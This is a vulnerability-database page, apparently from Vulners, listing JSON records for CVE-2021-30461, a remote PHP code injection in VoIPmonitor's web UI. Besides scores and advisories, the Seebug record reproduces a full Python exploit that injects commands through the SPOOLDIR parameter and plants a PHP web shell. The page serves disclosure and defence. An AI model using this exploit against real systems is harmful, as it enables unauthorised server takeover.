DATABASE RESOURCES PRICING ABOUT US

{"id": "2FC71FEA-D01A-505F-A34B-80EC65B2DE24", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Code Injection in Voipmonitor", "description": "### Impacted Products\r\n\r\nVoIPmonitor < 24.60\r\n\r\n### How to RCE\r...", "published": "2021-07-14T19:20:11", "modified": "2022-01-30T02:59:48", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-30461"], "immutableFields": [], "lastseen": "2022-01-30T03:44:28", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0425"]}, {"type": "cve", "idList": ["CVE-2021-30461"]}, {"type": "githubexploit", "idList": ["4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7"]}, {"type": "seebug", "idList": ["SSV:99239"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0425"]}, {"type": "cve", "idList": ["CVE-2021-30461"]}, {"type": "githubexploit", "idList": ["4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "seebug", "idList": ["SSV:99239"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 1646321174}, "privateArea": 1}

{"checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:08", "description": "A remote code execution vulnerability exists in VoIPmonitor. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-02T00:00:00", "type": "checkpoint_advisories", "title": "VoIPmonitor Remote Code Execution (CVE-2021-30461)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-08-02T00:00:00", "id": "CPAI-2021-0425", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:20:40", "description": "# CVE-2021-30461\nVOIP RCE\n\nTechn...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-07T09:22:01", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-10-10T08:47:13", "id": "4C29C6C8-3E9A-5617-80AD-E367D7C538B9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-05-19T06:50:48", "description": "### Impacted Products\r\n\r\nVoIPmonitor < 24.60\r\n\r\n### How to RCE\r...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T04:09:04", "type": "githubexploit", "title": "Exploit for Code Injection in Voipmonitor", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2022-05-19T06:07:23", "id": "8B5F5CC4-9345-5EC3-B507-5575BCD2D4F7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "cve": [{"lastseen": "2022-03-23T17:32:52", "description": "A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-29T14:15:00", "type": "cve", "title": "CVE-2021-30461", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30461"], "modified": "2021-06-09T17:43:00", "cpe": [], "id": "CVE-2021-30461", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30461", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "seebug": [{"lastseen": "2021-07-24T10:56:08", "description": "# SSD Advisory \u2013 VoIPmonitor UnAuth RCE\n\nMay 6, 2021 [SSD Disclosure / Technical Lead](https://ssd-disclosure.com/author/noamr/) [Uncategorized](https://ssd-disclosure.com/category/uncategorized/)\n\n**TL;DR**\n\nFind out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code.\n\n**Vulnerability Summary**\n\nVoIPmonitor is \u201copen source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux\u201d.\n\nUse of user supplied data, arriving via web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.\n\n**CVE**\n\nCVE-2021-30461\n\n***\\*Credit\\****\n\nAn independent security researcher, Furkan G\u00f6ksel, has reported this vulnerability to the SSD Secure Disclosure program.\n\n**Affected Versions**\n\nVoIPmonitor version 24.60 and prior\n\n**Vendor Response**\n\n\u201cA new GUI release 24.61 is fixing this security issue.\u201d\n\n**Vulnerability Analysis**\n\nDue to improper filtering of malicious function, attacker can able to run command via PHP application of VoIPMonitor\u2019s web UI.\n\nWhen POST request has been made to index.php file with `SPOOLDIR` and `recheck` parameters, the vulnerability can be triggered.\n\nThis is due to the fact that `SPOOLDIR` value gets introduced into the `config/configuration.php` file that is later called by the UI interface.\n\nThe `SPOOLDIR` value is placed \u201cas is\u201d in the PHP source code allowing remote attackers to insert arbitrary commands along with the intended value for this parameter.\n\n**Exploit**\n\n```python\nimport argparse\nfrom sys import argv,exit\nimport time\nimport random\nimport string\n\ntry:\n import requests\nexcept ImportError:\n print(\"pip3 install requests \")\n\nprint(\"\"\"\n###############################################\n# VOIP Monitor RCE #\n###############################################\n\"\"\")\n\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"Connection\": \"close\"}\n\n\ndef get_target(args):\n hostname = args.host\n path = args.path\n if path:\n return f\"http://{hostname}/{path}/index.php\"\n else:\n return f\"http://{hostname}/index.php\"\n\ndef set_tmp(args):\n global headers\n target = get_target(args)\n n_data = {\"SPOOLDIR\": \"/tmp\", \"recheck\": \"annen\"}\n set_totmp = requests.post(target, n_data, headers=headers)\n print(f\"[*] set /tmp {set_totmp}\")\n\n\ndef checkVulnerability(args):\n global headers\n target = get_target(args)\n print(f\"[+] Attacking {target}\")\n testcmd = {\"SPOOLDIR\": \"test\\\".system(id).\\\"\", \"recheck\": \"annen\"}\n response_text = b\"uid=\"\n testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)\n if response_text in testcmd_req.content:\n print(\"[*] host is vulnerable\")\n else:\n print(\"[-] host is not vulnerable\")\n exit()\n\n\ndef uploadshell(args):\n global headers\n hostname = args.host\n path = args.path\n shell_path = \"\"\n shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) )\n target = get_target(args)\n rce_payload = {\"SPOOLDIR\": f\"/tmp\\\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\\\"a\\\"]);').\\\"\", \"recheck\": \"annen\"}\n rce_req = requests.post(target, headers=headers, data=rce_payload)\n print(f\"[*] uploading shell {rce_req.status_code}\")\n if path:\n shell_path = f\"http://{hostname}/{path}/{shellfilename}.php\"\n else:\n shell_path = f\"http://{hostname}/{shellfilename}.php\"\n shell_check = requests.get(shell_path, headers=headers, params={'a':'id'})\n print(f\"[*] RCE Check : {shell_check.text}\")\n print(f\"[*] Your Shell at {shell_path}\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')\n parser.add_argument('-t','--host',help='Host', type=str)\n parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str)\n args = parser.parse_args()\n set_tmp(args)\n checkVulnerability(args)\n set_tmp(args)\n uploadshell(args)\n set_tmp(args)\n\n\n\nif __name__ == \"__main__\":\n main()\n```", "published": "2021-05-08T00:00:00", "type": "seebug", "title": "VoIPMonitor\u672a\u6388\u6743\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff08CVE-2021-30461\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-30461"], "modified": "2021-05-08T00:00:00", "id": "SSV:99239", "href": "https://www.seebug.org/vuldb/ssvid-99239", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": ""}]}